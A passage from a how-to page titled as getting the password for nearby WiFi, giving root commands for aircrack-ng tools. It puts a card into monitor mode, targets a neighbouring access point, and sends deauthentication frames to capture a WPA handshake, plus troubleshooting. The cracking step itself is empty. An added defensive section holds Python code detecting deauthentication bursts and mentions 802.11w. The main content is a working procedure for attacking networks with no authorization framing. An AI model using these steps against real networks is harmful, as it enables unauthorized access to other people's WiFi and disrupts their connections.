Tip: All of the following commands are executed as the root user.
One, shut down the network and end processes that may affect the results
1. Stop the network service
service network-manager stop
2. End processes that may affect the results
airmon-ng check kill
Two, switch the wireless card to monitor mode
1. Check the list of network cards
iwconfig
Note: wlan0 and wlan1 are the wireless cards; my computer has two wireless network cards.
2. Put the network card into monitor mode (wlan0 is used here)
airmon-ng start wlan0
Note: If monitor mode starts successfully, a new interface name is assigned, here mon0.
Three, listen to the surrounding wireless networks and get the handshake information
1. Listen to all surrounding wireless network information
airodump-ng mon0
In this command, mon0 is the interface name we got in the previous step.
Description: In the lower half of the output, look for rows whose BSSID column is not "(not associated)". Here the last row is:
c0:xx:xx:xx:xx:00 14:xx:xx:xx:xx:b4 -87 0-1 3 2
At this point, write down c0:xx:xx:xx:xx:00, find the row with the same c0:xx:xx:xx:xx:00 in the upper half of the output, and note that the value in its CH column is 1. Then close this window.
2. Listen to the wireless network of interest
Based on the results from the previous step, execute the following command:
airodump-ng --bssid c0:xx:xx:xx:xx:00 -c 1 -w tmp mon0
In this command, --bssid is followed by the BSSID value from the previous step, namely c0:xx:xx:xx:xx:00. The -c option is followed by the value 1 found in the CH column in the previous step. The -w option is followed by the name of the file in which the captured network data is saved, here tmp. The last argument is the mon0 interface obtained earlier.
After running the command, check the output and make sure that the lower half has at least one row of data under BSSID.
3. Get the handshake packet
Keep the window from the previous step open, open a new window, and execute the following command:
aireplay-ng -0 2 -a c0:xx:xx:xx:xx:00 -c 14:xx:xx:xx:xx:b4 mon0
In this command, the -a option is followed by the value c0:xx:xx:xx:xx:00 from the first row under the BSSID column in the lower half of the output. The -c option is followed by the value 14:xx:xx:xx:xx:b4 from the first row under the STATION column in the lower half. mon0 is the interface name obtained earlier. After execution:
Observe whether the content marked in red appears in the window from step 2 that we did not close. If it does not appear, wait a few minutes and execute the command in this step again until it does. If you have run it more than 30 times or more than 30 minutes have passed, it is recommended that you switch to another network of interest.
The content in the red box shows that we have obtained the handshake information (which contains data derived from the network password). We can then stop listening to the network.
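Seen from the defender's side, the deauthentication frames sent in step 3.3 are visible to any monitor-mode sensor on the same channel. The following is an added example, not part of the original page: it parses raw 802.11 frames (radiotap header already stripped) and flags a burst of deauthentication frames for one BSSID/station pair. The addresses, timings, window and threshold are constructed assumptions.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame-control byte 0: version 0, type 0 (management), subtype 12 (deauth)

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (receiver, transmitter, bssid, reason_code) for a deauth frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def deauth_bursts(capture, window=2.0, threshold=10):
    """capture: time-ordered (seconds, frame_bytes). Returns {(bssid, station): first alert time}."""
    recent, alerts = defaultdict(deque), {}
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        rx, tx, bssid, _ = parsed
        station = rx if tx == bssid else tx  # deauths can go either way; key on the client end
        times = recent[(bssid, station)]
        times.append(ts)
        while ts - times[0] > window:        # drop timestamps that fell out of the window
            times.popleft()
        if len(times) >= threshold:
            alerts.setdefault((bssid, station), ts)
    return alerts

# --- constructed sample capture (addresses and timings are made up) ---
AP, STA, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"

def make_deauth(rx, tx, bssid, reason=7):
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return b"\xc0\x00\x00\x00" + raw(rx) + raw(tx) + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason)

def sample_capture():
    frames = [(1.0, make_deauth(AP, OTHER, AP, reason=3))]        # a single deauth: not a burst
    frames.append((2.0, b"\x80" + make_deauth(STA, AP, AP)[1:]))  # beacon subtype byte: ignored
    for i in range(12):                                           # burst, alternating direction
        rx, tx = (STA, AP) if i % 2 == 0 else (AP, STA)
        frames.append((5.0 + i * 0.125, make_deauth(rx, tx, AP)))
    return frames

if __name__ == "__main__":
    print(deauth_bursts(sample_capture()))
```

On networks where 802.11w Protected Management Frames are negotiated, clients discard unauthenticated deauthentication frames, so an alert like this is most useful on networks that cannot yet require it.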
Four, stop monitoring
1. Shut down the monitoring interface
airmon-ng stop mon0
2. Start the network
service network-manager start
Five, get the password
Six, possible problems
1. "on channel -1" error
When executing the command from step 3.3:
aireplay-ng -0 2 -a c0:xx:xx:xx:xx:00 -c 14:xx:xx:xx:xx:b4 mon0
the following error is shown:
11:41:04 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
11:41:04 Couldn't determine current channel for mon0, should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
Workaround:
(1) Ensure that the window from step 3.1 is closed.
(2) Ensure that the command in step 3.2 is running and that both the name and the value of the -c option are correct (-c 1 locks mon0 onto channel 1).
Get the password for nearby WiFi using the Aircrack-ng tool